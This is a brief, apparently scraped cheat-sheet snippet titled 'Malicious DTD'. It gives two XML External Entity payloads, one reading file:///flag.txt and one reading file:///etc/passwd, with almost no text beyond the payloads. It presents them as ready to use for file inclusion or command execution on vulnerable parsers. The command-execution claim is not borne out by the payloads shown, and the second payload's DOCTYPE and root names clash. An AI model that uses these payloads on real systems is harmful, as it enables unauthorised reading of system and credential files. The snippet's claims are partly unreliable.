Malicious DTD
Following snippet can be used to get Local File Inclusion or Remote Command Execution on vulnerable XML.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 |
<br /><?xml version=”1.0”?> <!DOCTYPE cred [<!ENTITY xxe SYSTEM “file:///flag.txt”> <!ELEMENT cred (username, password)> <!ELEMENT username (#PCDATA)> <!ELEMENT password (#PCDATA)> ]> <cred> <username>&xxe;</username> <password>dsfdsf</password> </cred> <?xml version=”1.0”?> <!DOCTYPE cred [<!ENTITY xxe SYSTEM “file:///etc/passwd”> <!ELEMENT subnet_mask ANY>]> <details> <subnet_mask>&xxe;</subnet_mask> <test></test> </details> |
XXE/XML Attack